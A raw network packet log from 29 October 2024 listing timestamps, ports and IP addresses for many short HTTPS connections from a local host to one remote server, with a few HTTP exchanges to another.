                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.010607958 CET4436057413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.011183023 CET60574443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.011209965 CET4436057413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.011903048 CET60574443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.011909008 CET4436057413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.017894030 CET4436057313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.018253088 CET60573443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.018271923 CET4436057313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.018727064 CET60573443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.018733025 CET4436057313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.035458088 CET4436057513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.039103985 CET60575443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.039129972 CET4436057513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.039952040 CET60575443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.039958000 CET4436057513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.066231012 CET4436057613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.066709995 CET60576443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.066730976 CET4436057613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.067085028 CET60576443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.067090988 CET4436057613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.142806053 CET4436057413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.142858982 CET4436057413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.142894983 CET4436057413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.143047094 CET60574443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.143275976 CET60574443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.143290997 CET4436057413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.143300056 CET60574443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.143305063 CET4436057413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.146585941 CET60578443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.146624088 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.146711111 CET60578443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.146883011 CET60578443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.146898985 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.149842978 CET4436057313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.150000095 CET4436057313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.150063992 CET60573443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.150214911 CET60573443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.150234938 CET4436057313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.150247097 CET60573443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.150254965 CET4436057313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.152446032 CET60579443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.152507067 CET4436057913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.152595043 CET60579443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.152750015 CET60579443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.152770042 CET4436057913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.171530008 CET4436057513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.171716928 CET4436057513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.171801090 CET60575443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.171943903 CET60575443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.171951056 CET4436057513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.171962023 CET60575443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.171966076 CET4436057513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.173960924 CET60580443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.174043894 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.174130917 CET60580443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.174249887 CET60580443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.174287081 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.197743893 CET4436057613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.197798014 CET4436057613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.197987080 CET4436057613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.198085070 CET60576443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.198085070 CET60576443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.198118925 CET60576443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.198120117 CET60576443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.198133945 CET4436057613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.198144913 CET4436057613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.200040102 CET60581443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.200133085 CET4436058113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.200365067 CET60581443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.200365067 CET60581443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.200467110 CET4436058113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.212958097 CET4436057713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.215245008 CET60577443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.215281963 CET4436057713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.215678930 CET60577443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.215692043 CET4436057713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.345828056 CET4436057713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.345846891 CET4436057713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.345904112 CET4436057713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.345921993 CET60577443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.346086025 CET60577443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.346244097 CET60577443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.346244097 CET60577443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.346280098 CET4436057713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.346303940 CET4436057713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.349069118 CET60582443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.349128962 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.349206924 CET60582443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.349520922 CET60582443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.349550962 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.835241079 CET6058380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.841466904 CET8060583142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.841650963 CET6058380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.841892004 CET6058380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.848100901 CET8060583142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.881422997 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.881951094 CET60578443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.881982088 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.882462025 CET60578443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.882468939 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.887204885 CET4436057913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.887556076 CET60579443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.887593985 CET4436057913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.887953043 CET60579443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.887968063 CET4436057913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.914509058 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.914998055 CET60580443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.915038109 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.915400982 CET60580443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.915417910 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.932998896 CET4436058113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.933273077 CET60581443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.933357954 CET4436058113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.933629990 CET60581443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:54.933644056 CET4436058113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.012675047 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.012701035 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.012748957 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.012758970 CET60578443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.012814999 CET60578443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.013114929 CET60578443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.013138056 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.013153076 CET60578443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.013159037 CET4436057813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.015450954 CET4436057913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.015633106 CET4436057913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.015702963 CET60579443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.015945911 CET60579443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.015983105 CET4436057913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.016010046 CET60579443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.016026020 CET4436057913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.017155886 CET60584443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.017261028 CET4436058413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.017333984 CET60584443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.017695904 CET60584443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.017733097 CET4436058413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.018414021 CET60585443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.018460035 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.018517017 CET60585443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.018635035 CET60585443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.018650055 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.046272039 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.046339035 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.046415091 CET60580443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.046438932 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.046494961 CET60580443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.046598911 CET60580443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.046642065 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.046670914 CET60580443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.046685934 CET4436058013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.048710108 CET60586443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.048778057 CET4436058613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.048867941 CET60586443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.049009085 CET60586443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.049038887 CET4436058613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.081557989 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.081978083 CET60582443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.082034111 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.082465887 CET60582443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.082479000 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.163539886 CET4436058113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.163609028 CET4436058113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.163738012 CET60581443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.164140940 CET60581443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.164199114 CET4436058113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.164235115 CET60581443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.164251089 CET4436058113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.166397095 CET60587443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.166429043 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.166508913 CET60587443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.166639090 CET60587443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.166654110 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.215811968 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.215841055 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.215879917 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.215895891 CET60582443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.215934038 CET60582443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.216192961 CET60582443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.216217995 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.216242075 CET60582443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.216253042 CET4436058213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.218265057 CET60588443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.218297958 CET4436058813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.218379021 CET60588443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.218488932 CET60588443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.218502045 CET4436058813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.749557018 CET4436058413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.750171900 CET60584443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.750243902 CET4436058413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.750689030 CET60584443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.750724077 CET4436058413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.772399902 CET8060583142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.772473097 CET6058380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.772866964 CET6058380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.772893906 CET6058380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.773216009 CET8060583142.251.168.82192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.773268938 CET6058380192.168.2.5142.251.168.82
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.804392099 CET4436058613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.805308104 CET60586443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.805349112 CET4436058613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.805763960 CET60586443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.805775881 CET4436058613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.808933020 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.809390068 CET60585443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.809398890 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.809828997 CET60585443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.809834003 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.878132105 CET4436058413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.878288984 CET4436058413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.878369093 CET60584443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.878523111 CET60584443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.878523111 CET60584443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.878571033 CET4436058413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.878599882 CET4436058413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.882597923 CET60589443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.882635117 CET4436058913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.883999109 CET60589443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.884263992 CET60589443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.884279966 CET4436058913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.898799896 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.900324106 CET60587443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.900340080 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.900763035 CET60587443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.900768042 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.938942909 CET4436058613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.939089060 CET4436058613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.939172983 CET60586443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.939237118 CET60586443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.939237118 CET60586443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.939263105 CET4436058613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.939304113 CET4436058613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941339016 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941368103 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941406012 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941430092 CET60585443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941471100 CET60585443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941584110 CET60585443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941598892 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941608906 CET60585443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941617012 CET4436058513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941633940 CET60590443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.941684961 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.942830086 CET60590443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.942969084 CET60590443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.942986965 CET4436059013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.943751097 CET60591443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.943768024 CET4436059113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.943825960 CET60591443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.943968058 CET60591443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.943979025 CET4436059113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.966310024 CET4436058813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.966667891 CET60588443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.966691971 CET4436058813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.967087984 CET60588443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:55.967092991 CET4436058813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.031759024 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.031785011 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.031821012 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.031871080 CET60587443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.032124043 CET60587443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.032124043 CET60587443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.032149076 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.032157898 CET4436058713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.036823988 CET60592443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.036855936 CET4436059213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.036917925 CET60592443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.037470102 CET60592443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.037483931 CET4436059213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.098288059 CET4436058813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:56.098366976 CET4436058813.107.246.45192.168.2.5
